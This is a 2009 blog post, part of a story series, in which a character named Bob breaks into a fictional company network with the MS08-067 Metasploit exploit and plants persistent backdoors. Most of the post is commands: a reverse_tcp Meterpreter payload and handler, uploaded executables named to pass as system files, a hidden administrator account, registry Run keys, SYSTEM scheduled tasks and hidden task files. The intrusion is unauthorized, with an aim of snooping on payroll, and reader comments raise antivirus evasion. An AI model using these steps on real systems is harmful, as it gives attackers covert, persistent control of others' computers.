Friday, November 20, 2009

Bob The Backdoor Man - Part 2

Previously in Bob Land....

The very next day Bob feels ready to hop back onto his compromised host on the Walliford Fries LAN and get his back doors planted. He logs into the wireless network with the WPA key he cracked earlier and he uses the gets a shell on the unpatched PC with the MS08-067 exploit.

use windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp

set LPORT 8181


Bob migrates to a stable process then uploads his backdoors to the Windows\System32 directory using Meterpreters upload function.

migrate 714
lcd /root/payloads
upload winmsd32.exe

upload winmsd16.exe

After Bob lauches a shell he creates a new user and adds it to the Administrators, Power Users and the Backup Operators groups

net user MS_Support31337 Support31337 /add
net localgroup Administrators MS_Support31337 /add
net localgroup "Backup Operators" MS_Support31337 /add

net localgroup "Power Users" MS_Support31337 /add

He choose these privileged groups as a group policy may be configured to control the local Administrators group and by remaining in the other groups he will still have a high level of access.

Now Bob wants to get down to business and plant some of these lovely backdoors he's created. Bobs first port of call is to create a registry entry to run his meterpreter payload and connect back to Bob each time the computer is booted.

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Microsoft winmsd32" /d "C:\Windows\System32\winmsd32.exe"

Bob check that his registry entry has been set using the reg query command.

reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Then it occurs to Bob that someone may well stumble across his registry entry and remove it so he decides to have a backup by creating some scheduled tasks. One task (the meterpeter reverse connect) will run every 10 minutes and the other (the listening shell) will run at startup.

schtasks /create /tn "Winmsd32" /tr C:\Windows\System32\winmsd32.exe /sc minute /mo 10 /RU "NT AUTHORITY\SYSTEM"

schtasks /create /tn "Winmsd16" /tr C:\Windows\System32\winmsd16.exe /sc onstart /RU "NT AUTHORITY\SYSTEM"

Now the only way the normal logged in user would see these Scheduled Tasks is by looking at the directory using a command prompt. Only an Administrator running schtasks on the PC would see these scheduled tasks, anyone else will see nothing. Even looking at the C:\Windows\Tasks folder through explorer wouldn't show the tasks as it will only show the current users tasks.

Bobs pretty happy about this but what would make him happier would be if it was really really hard to see his backdoors. Then it occurs to him that by changing the attributes on the jobs in the tasks folder it would be really really hard as the user would have to do a "dir /a:h *.*" on the directory specifically. Okay, so thats not really really hard but it is a bit of a bugger!

cd \windows\tasks
Attrib +H winmsd*.job

Then Bob checks his handy work by looking at just hidden files.

Great, Bob fires up another instance of msfconsole and sets up his handler for the sessions that should start coming in.

use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp


set LPORT 8080
set ExitOnSession false

set AutoRunScript winenum.rb

exploit -j -z

Within a minute or 2 Bob gets a session from his scheduled task backdoor.

What he really likes about these scheduled tasks is he wont get loads of sessions back from the same host, but if he looses connection he'll get another session back 10 minutes later. Also, every now and then Bob can change the AutoRunScript so Metasploit can gather all sorts of useful information on his behalf.

Now Bob is in, he has his backdoors sorted and he wants to have a look around to see what else might be interesting. Bob has a knows a guy who works for Wallifords. Now this guys is a bit of a dick and is always boasting about how much he earns. Bobs sure the guy exaggerates, wouldn't it be nice if Bob could access the payroll data and see if this guy is telling the truth?

Oh, look at that, lunch time. Bob goes and gets his dinner and has a think about what other interesting things he might be able to find on the Walliford network.

Coming next.......Bob gets to know his new friends!


Bad_Dua said...

Syn I want to congrats you mate. Your site is very informative.For this scenario in order bob to back connect the system. He might think to configure firewalls. Because I am assuming this is a middle level company so they might have some firewalls. Bob needs to figure out howto configure them as well am i right?

TAPE said...

This series has been marvellous sofar, I'm really enjoying it!

Excellent job on the explaining of the msf parts of the story. clear yet concise !

Looking forward to see what Bob will come up with next..

SynJunkie said...

Thanks Guys.

Bad_Dua - Your right, Bob will need to pull a few firewall tricks out the bag. He's been lucky not to hit one on the current host but you can be sure that i'll be covering both the Windows firewall and Cisco firewall (or at least routers pretending to be firewalls) soon.

Thanks for the suggestion.


Dave said...

How did Bob enjoy Christmas? Did he manage to sort anything out about obfuscating netcat.exe to avoid those nasty AVs?

Has he thought any more about the Windows firewall and Cisco firewall/router tricks?

SynJunkie said...

So I hear, Bob has got some great posts lined up.

At the moment I'm quite busy on my Cisco Blog ( trying to focus so I can get the CCNA which I really should have done by Christmas 2009. I guess I got distracted by the Bob adventures a little too much.

More Bob stuff to come soon, promise.

Dave said...

Ahh - I wondered what had happened to the series of CCNA posts that you posted here last year.

Good luck with your studies. I hope that you get it under your belt PDQ so Bob can resume his challenges!

SynJunkie said...

Well cheers for the interest Dave. I had a comment or two that some readers were not so much into the whole networking/cisco thing so I thought I would separate the topics and focus this blog on the Bob stuff and create another one for my studies.

More Bob to come soon.


Dave said...

Bob likes Metasploit. Might he be interested in Metasploit DHCP Exhaustion and DNS MITM (

SynJunkie said...

Thanks Dave. Bob does like Metasploit. Bob wishes he had more time for Metasploit fun instead of studying!

I'll be sure to take a look soon.